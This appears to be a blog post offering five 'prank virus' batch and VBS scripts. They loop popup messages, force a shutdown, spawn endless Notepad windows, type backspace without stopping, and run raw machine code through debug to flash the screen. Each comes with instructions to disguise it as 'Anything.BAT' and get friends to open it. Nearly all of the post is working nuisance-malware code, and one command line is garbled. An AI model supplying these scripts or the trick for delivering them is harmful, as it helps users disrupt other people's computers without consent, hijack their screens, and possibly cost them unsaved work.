Virus Notepad Codes to Irritate Friends..!!

Hi Friends,
I am back with some tricks which i hope you all will like. Are you free and want to irritate your friends ??
I have some Notepad Virus Codes which will surely irritate your friends. You have to just follow few simple steps.


1. Cycle a message in your friend's computer

   If you try this method you will surely be able to irritate your friends as this trick will continuously display the message on the monitor and your friend will not be able to close it.


  • Open notepad. 
  • Type:

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?


msg * I am!

msg * Lets have fun together!

msg * Because you have been o-w-n-e-d

GOTO BEGIN







  • Save it as Anything.BAT and send it to your friends and tell them to open it and they will get irritated...!!!
    _______________________________________________________________________

  • 2. Convey this message to your friends and shut down his / her computer:
    Send this message to your friends and it will shut down their computer automatically.
    • Open notepad.
    • Type :

      wx@echo off
                                                                 msg * I don't like you
      shutdown -c Error! You are too stupid! -s
    Save it as Anything.BAT and send it to your friends and tell them to open it and their computers will automatically shut down...!!!
    ________________________________________________________________________

    3. Open Notepad continuously in your friend's computer:
    If you send this message to your friends it will open notepad continuously in their computers which will irritate as it will also decrease the speed of their computer.
    Open Notepad.
    • Type:
    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top
                   
    Save it as Anything.BAT and send it to your friends and tell them to open it and a lot of notepads will open in their computers which they will not be able to close and will get irritated...!!!
    ________________________________________________________________________

    4. Frustrate your friends and make them type backspace simultaneously:
    Send this to message to your friends and make them type backspace simultaneously by creating a VBS file :
    • Open Notepad 
    • Type:
    MsgBox "Let's go back a few steps"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop
                   
    Save it as Anything.VBS and send it to your friends and tell them to open it and backspace will be automatically typed simultaneously which will not allow your friends to type anything and they will surely get irritated..!!!
    ________________________________________________________________________

    5. Threaten your friends by making the screen flash :
    If you send this file to your friend he will surely get irritated and afraid as the screen will automatically flash continuously :
    • Open Notepad.
    • Type:
    @echo off
    :a
    echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
    echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
    echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
    echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
    echo g=100>>\z.dbg
    echo q>>\z.dbg
    debug <\z.dbg>nul
    del \z.dbg
    goto a
                      
    Save it as Anything.BAT and send it to your friends and tell them to open it and their screen will start flashing automatically which will make your friend afraid and irritated..!!